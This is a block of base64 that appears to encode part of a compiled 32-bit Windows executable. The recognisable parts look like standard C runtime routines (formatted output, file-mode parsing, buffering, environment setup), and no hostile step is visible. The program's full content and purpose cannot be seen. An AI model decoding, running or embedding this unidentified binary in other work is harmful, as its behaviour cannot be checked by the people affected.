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 